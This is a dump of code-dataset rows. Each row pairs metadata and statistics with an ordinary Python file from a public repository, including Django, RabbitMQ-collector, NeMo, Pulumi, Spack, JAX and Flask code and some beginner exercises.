with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res
| 34.638298 | 116 | 0.673219 | 204 | 1,628 | 5.27451 | 0.421569 | 0.066915 | 0.126394 | 0.04461 | 0.268587 | 0.236989 | 0.236989 | 0.236989 | 0.236989 | 0.107807 | 0 | 0.023432 | 0.187346 | 1,628 | 46 | 117 | 35.391304 | 0.789872 | 0 | 0 | 0.064516 | 0 | 0 | 0.209121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.032258 | 0.096774 | null | null | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe97e4775b3fbd1abdf826717d17fd4e96f2144c | 353 | py | Python | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 21 | 2018-04-18T17:58:12.000Z | 2022-01-19T12:41:01.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 4 | 2018-04-24T11:04:15.000Z | 2022-02-03T18:35:21.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 7 | 2018-03-04T16:03:44.000Z | 2022-02-03T15:50:39.000Z | from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
| 23.533333 | 60 | 0.708215 | 41 | 353 | 5.878049 | 0.512195 | 0.107884 | 0.165975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203966 | 353 | 14 | 61 | 25.214286 | 0.857651 | 0.220963 | 0 | 0 | 0 | 0 | 0.117647 | 0.086275 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
fe98a505a6e3e05977900098d14a4c4efb60654a | 502 | py | Python | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | ## Highest Score
# 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
# Write your code below this row 👇
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | 26.421053 | 66 | 0.721116 | 82 | 502 | 4.341463 | 0.439024 | 0.292135 | 0.02809 | 0.061798 | 0.101124 | 0.101124 | 0 | 0 | 0 | 0 | 0 | 0.004819 | 0.173307 | 502 | 19 | 67 | 26.421053 | 0.840964 | 0.250996 | 0 | 0 | 0 | 0 | 0.186486 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fea585d93413c287bd31eaa0525d97e26cbdcd0b | 742 | py | Python | codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | for i in range(int(input())):
number_of_candies = int(input())
candies_weights = list(map(int, input().split()))
bob_pos = number_of_candies - 1
alice_pos = 0
bob_current_weight = 0
alice_current_weight = 0
last_equal_candies_total_number = 0
while alice_pos <= bob_pos:
if alice_current_weight <= bob_current_weight:
alice_current_weight += candies_weights[alice_pos]
alice_pos += 1
else:
bob_current_weight += candies_weights[bob_pos]
bob_pos -= 1
if alice_current_weight == bob_current_weight:
last_equal_candies_total_number = alice_pos + (number_of_candies - bob_pos - 1)
print(last_equal_candies_total_number)
| 29.68 | 91 | 0.665768 | 100 | 742 | 4.47 | 0.27 | 0.232662 | 0.143177 | 0.14094 | 0.342282 | 0.161074 | 0.161074 | 0 | 0 | 0 | 0 | 0.014467 | 0.254717 | 742 | 24 | 92 | 30.916667 | 0.793852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.055556 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
feb04d32f16beda0e1b583eb23a6f47a91df44ef | 695 | py | Python | src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
] | 2 | 2020-12-17T20:19:21.000Z | 2020-12-22T12:46:43.000Z | src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
] | 4 | 2021-04-20T08:40:30.000Z | 2022-02-10T07:50:30.000Z | src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
] | 1 | 2021-02-10T06:42:19.000Z | 2021-02-10T06:42:19.000Z | # Generated by Django 3.1.7 on 2021-03-24 17:41
import django.db.models.deletion
from django.conf import settings
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("blog", "0002_auto_20210323_1834"),
]
operations = [
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
]
| 24.821429 | 66 | 0.604317 | 76 | 695 | 5.394737 | 0.605263 | 0.078049 | 0.068293 | 0.107317 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063918 | 0.302158 | 695 | 27 | 67 | 25.740741 | 0.781443 | 0.064748 | 0 | 0.095238 | 1 | 0 | 0.057099 | 0.035494 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228122dba71ea421f33f3e5c51b862184d5fc4c8 | 205 | py | Python | hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 3f031eac9559a10fdcf70a88ee4c548cf93e4ac2 | [
"MIT"
] | 7 | 2019-03-31T17:58:45.000Z | 2020-02-29T22:44:27.000Z | hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 3f031eac9559a10fdcf70a88ee4c548cf93e4ac2 | [
"MIT"
] | 90 | 2019-03-26T01:14:54.000Z | 2021-06-10T21:30:25.000Z | hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 3f031eac9559a10fdcf70a88ee4c548cf93e4ac2 | [
"MIT"
] | null | null | null | from django.urls import path
from issue_template.views import IssueTemplateView
urlpatterns = [
path(
'<str:owner>/<str:repo>/<str:token_auth>/',
IssueTemplateView.as_view()
),
]
| 18.636364 | 51 | 0.668293 | 23 | 205 | 5.826087 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204878 | 205 | 10 | 52 | 20.5 | 0.822086 | 0 | 0 | 0 | 0 | 0 | 0.195122 | 0.195122 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22849e131dffff72236a4d1d46cddf477f92bab9 | 2,823 | py | Python | src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 2772cdbc27a7ba3fedeb6d4241aeee9d2fcbdb80 | [
"MIT"
] | null | null | null | src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 2772cdbc27a7ba3fedeb6d4241aeee9d2fcbdb80 | [
"MIT"
] | null | null | null | src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 2772cdbc27a7ba3fedeb6d4241aeee9d2fcbdb80 | [
"MIT"
] | null | null | null | # coding=utf-8
"""
Collects data from RabbitMQ through the admin interface
#### Notes
* if two vhosts have the queues with the same name, the metrics will collide
#### Dependencies
* pyrabbit
"""
import diamond.collector
try:
from numbers import Number
Number # workaround for pyflakes issue #13
import pyrabbit.api
except ImportError:
Number = None
class RabbitMQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(RabbitMQCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname and port to collect from',
'user': 'Username',
'password': 'Password',
'queues': 'Queues to publish. Leave empty to publish all.',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(RabbitMQCollector, self).get_default_config()
config.update({
'path': 'rabbitmq',
'host': 'localhost:55672',
'user': 'guest',
'password': 'guest',
})
return config
def collect(self):
if Number is None:
self.log.error('Unable to import either Number or pyrabbit.api')
return {}
queues = []
if 'queues' in self.config:
queues = self.config['queues'].split()
try:
client = pyrabbit.api.Client(self.config['host'],
self.config['user'],
self.config['password'])
for queue in client.get_queues():
# skip queues we don't want to publish
if queues and queue['name'] not in queues:
continue
for key in queue:
name = '{0}.{1}'.format('queues', queue['name'])
self._publish_metrics(name, [], key, queue)
overview = client.get_overview()
for key in overview:
self._publish_metrics('', [], key, overview)
except Exception, e:
self.log.error('Couldnt connect to rabbitmq %s', e)
return {}
def _publish_metrics(self, name, prev_keys, key, data):
"""Recursively publish keys"""
value = data[key]
keys = prev_keys + [key]
if isinstance(value, dict):
for new_key in value:
self._publish_metrics(name, keys, new_key, value)
elif isinstance(value, Number):
joined_keys = '.'.join(keys)
if name:
publish_key = '{0}.{1}'.format(name, joined_keys)
else:
publish_key = joined_keys
self.publish(publish_key, value)
| 30.031915 | 78 | 0.54729 | 299 | 2,823 | 5.056856 | 0.361204 | 0.039683 | 0.042328 | 0.025132 | 0.055556 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0.006515 | 0.347503 | 2,823 | 93 | 79 | 30.354839 | 0.814332 | 0.029047 | 0 | 0.096774 | 0 | 0 | 0.123271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.048387 | 0.080645 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2285470cfe61c3208efb829c668012f4eb4c042d | 196 | py | Python | classifier/cross_validation.py | ahmdrz/spam-classifier | a9cc3916a7c22545c82f0bfae7e4b95f3b36248f | [
"MIT"
] | 1 | 2019-08-05T12:02:53.000Z | 2019-08-05T12:02:53.000Z | classifier/cross_validation.py | ahmdrz/spam-classifier | a9cc3916a7c22545c82f0bfae7e4b95f3b36248f | [
"MIT"
] | null | null | null | classifier/cross_validation.py | ahmdrz/spam-classifier | a9cc3916a7c22545c82f0bfae7e4b95f3b36248f | [
"MIT"
] | null | null | null | from sklearn.model_selection import KFold
def kfold_cross_validation(data, k=10):
kfold = KFold(n_splits=k)
for train, test in kfold.split(data):
yield data[train], data[test] | 32.666667 | 41 | 0.704082 | 30 | 196 | 4.466667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.193878 | 196 | 6 | 42 | 32.666667 | 0.835443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228b1c94896beb15138918d15679461767abdb01 | 3,238 | py | Python | examples/nlp/language_modeling/megatron_gpt_ckpt_to_nemo.py | rilango/NeMo | 6f23ff725c596f25fab6043d95e7c0b4a5f56331 | [
"Apache-2.0"
] | null | null | null | examples/nlp/language_modeling/megatron_gpt_ckpt_to_nemo.py | rilango/NeMo | 6f23ff725c596f25fab6043d95e7c0b4a5f56331 | [
"Apache-2.0"
] | null | null | null | examples/nlp/language_modeling/megatron_gpt_ckpt_to_nemo.py | rilango/NeMo | 6f23ff725c596f25fab6043d95e7c0b4a5f56331 | [
"Apache-2.0"
] | 1 | 2021-12-07T08:15:36.000Z | 2021-12-07T08:15:36.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from argparse import ArgumentParser
import torch.multiprocessing as mp
from pytorch_lightning.trainer.trainer import Trainer
from nemo.collections.nlp.models.language_modeling.megatron_gpt_model import MegatronGPTModel
from nemo.collections.nlp.parts.nlp_overrides import NLPSaveRestoreConnector
from nemo.utils import AppState, logging
def get_args():
parser = ArgumentParser()
parser.add_argument(
"--checkpoint_folder",
type=str,
default=None,
required=True,
help="Path to PTL checkpoints saved during training. Ex: /raid/nemo_experiments/megatron_gpt/checkpoints",
)
parser.add_argument(
"--checkpoint_name",
type=str,
default=None,
required=True,
help="Name of checkpoint to be used. Ex: megatron_gpt--val_loss=6.34-step=649-last.ckpt",
)
parser.add_argument(
"--hparams_file",
type=str,
default=None,
required=False,
help="Path config for restoring. It's created during training and may need to be modified during restore if restore environment is different than training. Ex: /raid/nemo_experiments/megatron_gpt/hparams.yaml",
)
parser.add_argument("--nemo_file_path", type=str, default=None, required=True, help="Path to output .nemo file.")
parser.add_argument("--tensor_model_parallel_size", type=int, required=True, default=None)
args = parser.parse_args()
return args
def convert(rank, world_size, args):
app_state = AppState()
app_state.data_parallel_rank = 0
trainer = Trainer(gpus=args.tensor_model_parallel_size)
# TODO: reach out to PTL For an API-safe local rank override
trainer.accelerator.training_type_plugin._local_rank = rank
if args.tensor_model_parallel_size is not None and args.tensor_model_parallel_size > 1:
# inject model parallel rank
checkpoint_path = os.path.join(args.checkpoint_folder, f'mp_rank_{rank:02d}', args.checkpoint_name)
else:
checkpoint_path = os.path.join(args.checkpoint_folder, args.checkpoint_name)
model = MegatronGPTModel.load_from_checkpoint(checkpoint_path, hparams_file=args.hparams_file, trainer=trainer)
model._save_restore_connector = NLPSaveRestoreConnector()
model.save_to(args.nemo_file_path)
logging.info(f'NeMo model saved to: {args.nemo_file_path}')
def main() -> None:
args = get_args()
world_size = args.tensor_model_parallel_size
mp.spawn(convert, args=(world_size, args), nprocs=world_size, join=True)
if __name__ == '__main__':
main() # noqa pylint: disable=no-value-for-parameter
| 37.218391 | 218 | 0.734713 | 444 | 3,238 | 5.177928 | 0.414414 | 0.026098 | 0.036973 | 0.050022 | 0.196607 | 0.122662 | 0.122662 | 0.073075 | 0.034798 | 0 | 0 | 0.006749 | 0.176343 | 3,238 | 86 | 219 | 37.651163 | 0.855268 | 0.220198 | 0 | 0.207547 | 0 | 0.037736 | 0.226874 | 0.075758 | 0 | 0 | 0 | 0.011628 | 0 | 1 | 0.056604 | false | 0 | 0.132075 | 0 | 0.207547 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228b861994dfd3c8d5b7524f5b44ae49bacc2148 | 6,007 | py | Python | sdk/python/pulumi_aws/apigateway/api_key.py | dixler/pulumi-aws | 88838ed6d412c092717a916b0b5b154f68226c3a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/apigateway/api_key.py | dixler/pulumi-aws | 88838ed6d412c092717a916b0b5b154f68226c3a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/apigateway/api_key.py | dixler/pulumi-aws | 88838ed6d412c092717a916b0b5b154f68226c3a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class ApiKey(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
Amazon Resource Name (ARN)
"""
created_date: pulumi.Output[str]
"""
The creation date of the API key
"""
description: pulumi.Output[str]
"""
The API key description. Defaults to "Managed by Pulumi".
"""
enabled: pulumi.Output[bool]
"""
Specifies whether the API key can be used by callers. Defaults to `true`.
"""
last_updated_date: pulumi.Output[str]
"""
The last update date of the API key
"""
name: pulumi.Output[str]
"""
The name of the API key
"""
tags: pulumi.Output[dict]
"""
Key-value mapping of resource tags
"""
value: pulumi.Output[str]
"""
The value of the API key. If not specified, it will be automatically generated by AWS on creation.
"""
def __init__(__self__, resource_name, opts=None, description=None, enabled=None, name=None, tags=None, value=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an API Gateway API Key.
> **NOTE:** Since the API Gateway usage plans feature was launched on August 11, 2016, usage plans are now **required** to associate an API key with an API stage.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The API key description. Defaults to "Managed by Pulumi".
:param pulumi.Input[bool] enabled: Specifies whether the API key can be used by callers. Defaults to `true`.
:param pulumi.Input[str] name: The name of the API key
:param pulumi.Input[dict] tags: Key-value mapping of resource tags
:param pulumi.Input[str] value: The value of the API key. If not specified, it will be automatically generated by AWS on creation.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/api_gateway_api_key.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if description is None:
description = 'Managed by Pulumi'
__props__['description'] = description
__props__['enabled'] = enabled
__props__['name'] = name
__props__['tags'] = tags
__props__['value'] = value
__props__['arn'] = None
__props__['created_date'] = None
__props__['last_updated_date'] = None
super(ApiKey, __self__).__init__(
'aws:apigateway/apiKey:ApiKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, created_date=None, description=None, enabled=None, last_updated_date=None, name=None, tags=None, value=None):
"""
Get an existing ApiKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[str] created_date: The creation date of the API key
:param pulumi.Input[str] description: The API key description. Defaults to "Managed by Pulumi".
:param pulumi.Input[bool] enabled: Specifies whether the API key can be used by callers. Defaults to `true`.
:param pulumi.Input[str] last_updated_date: The last update date of the API key
:param pulumi.Input[str] name: The name of the API key
:param pulumi.Input[dict] tags: Key-value mapping of resource tags
:param pulumi.Input[str] value: The value of the API key. If not specified, it will be automatically generated by AWS on creation.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/api_gateway_api_key.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["created_date"] = created_date
__props__["description"] = description
__props__["enabled"] = enabled
__props__["last_updated_date"] = last_updated_date
__props__["name"] = name
__props__["tags"] = tags
__props__["value"] = value
return ApiKey(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 45.507576 | 170 | 0.662227 | 780 | 6,007 | 4.85641 | 0.214103 | 0.031679 | 0.038015 | 0.029039 | 0.525607 | 0.471489 | 0.447466 | 0.396779 | 0.368004 | 0.326558 | 0 | 0.001553 | 0.249542 | 6,007 | 131 | 171 | 45.854962 | 0.838731 | 0.374064 | 0 | 0.03125 | 1 | 0 | 0.141145 | 0.009321 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.015625 | 0.09375 | 0.03125 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228d76877f0d9f67ffc6dc7483c7c0a95962b0f9 | 864 | py | Python | var/spack/repos/builtin/packages/perl-ipc-run/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2020-10-15T01:08:42.000Z | 2021-10-18T01:28:18.000Z | var/spack/repos/builtin/packages/perl-ipc-run/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2019-07-30T10:12:28.000Z | 2019-12-17T09:02:27.000Z | var/spack/repos/builtin/packages/perl-ipc-run/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2019-07-30T09:42:14.000Z | 2021-01-25T05:39:20.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PerlIpcRun(PerlPackage):
"""IPC::Run allows you to run and interact with child processes using
files, pipes, and pseudo-ttys. Both system()-style and scripted usages are
supported and may be mixed. Likewise, functional and OO API styles are both
supported and may be mixed."""
homepage = "https://metacpan.org/pod/IPC::Run"
url = "https://cpan.metacpan.org/authors/id/T/TO/TODDR/IPC-Run-20180523.0.tar.gz"
version('20180523.0', sha256='3850d7edf8a4671391c6e99bb770698e1c45da55b323b31c76310913349b6c2f')
depends_on('perl-io-tty', type=('build', 'run'))
depends_on('perl-readonly', type='build')
| 39.272727 | 100 | 0.730324 | 119 | 864 | 5.285714 | 0.731092 | 0.028617 | 0.047695 | 0.054054 | 0.069952 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103825 | 0.152778 | 864 | 21 | 101 | 41.142857 | 0.755464 | 0.503472 | 0 | 0 | 0 | 0.142857 | 0.531863 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
228e9262ba137f922fefb676a2a9e3eabc4bf87c | 804 | py | Python | src/tevatron/tevax/loss.py | vjeronymo2/tevatron | 7235b0823b5c3cdf1c8ce8f67cb5f1209218086a | [
"Apache-2.0"
] | 95 | 2021-09-16T00:35:17.000Z | 2022-03-31T04:59:05.000Z | src/tevatron/tevax/loss.py | vjeronymo2/tevatron | 7235b0823b5c3cdf1c8ce8f67cb5f1209218086a | [
"Apache-2.0"
] | 16 | 2021-10-05T12:29:33.000Z | 2022-03-31T17:59:20.000Z | src/tevatron/tevax/loss.py | vjeronymo2/tevatron | 7235b0823b5c3cdf1c8ce8f67cb5f1209218086a | [
"Apache-2.0"
] | 15 | 2021-09-19T02:20:03.000Z | 2022-03-10T03:00:23.000Z | import jax.numpy as jnp
from jax import lax
import optax
import chex
def _onehot(labels: chex.Array, num_classes: int) -> chex.Array:
x = labels[..., None] == jnp.arange(num_classes).reshape((1,) * labels.ndim + (-1,))
x = lax.select(x, jnp.ones(x.shape), jnp.zeros(x.shape))
return x.astype(jnp.float32)
def p_contrastive_loss(ss: chex.Array, tt: chex.Array, axis: str = 'device') -> chex.Array:
per_shard_targets = tt.shape[0]
per_sample_targets = int(tt.shape[0] / ss.shape[0])
labels = jnp.arange(0, per_shard_targets, per_sample_targets) + per_shard_targets * lax.axis_index(axis)
tt = lax.all_gather(tt, axis).reshape((-1, ss.shape[-1]))
scores = jnp.dot(ss, jnp.transpose(tt))
return optax.softmax_cross_entropy(scores, _onehot(labels, scores.shape[-1]))
| 36.545455 | 108 | 0.690299 | 129 | 804 | 4.147287 | 0.395349 | 0.084112 | 0.084112 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016058 | 0.14801 | 804 | 21 | 109 | 38.285714 | 0.764964 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.266667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22915424775bb0c1cd95df8d2deeb30cca4451ba | 1,845 | py | Python | python_test.py | jackKiZhu/mypython | 43eac97bec07338ed3b8b9473d4e4fae26f7140c | [
"MIT"
] | null | null | null | python_test.py | jackKiZhu/mypython | 43eac97bec07338ed3b8b9473d4e4fae26f7140c | [
"MIT"
] | null | null | null | python_test.py | jackKiZhu/mypython | 43eac97bec07338ed3b8b9473d4e4fae26f7140c | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "mysql://root:mysql@127.0.0.1:3306/python_github"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = True
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_name = db.Column(db.String(64), unique=True)
user_password = db.Column(db.String(32))
def __repr__(self):
return "用户id:%s 用户名:%s" % (self.id, self.user_name)
@app.route("/", methods=["post", "get"])
def index():
index_meg = ""
if request.method == "POST":
user_name = request.form.get("user_name", "")
user_pwd = request.form.get("user_pwd", "")
if not all([user_name, user_pwd]):
index_meg = "请正确输入信息"
else:
print(request.get_data())
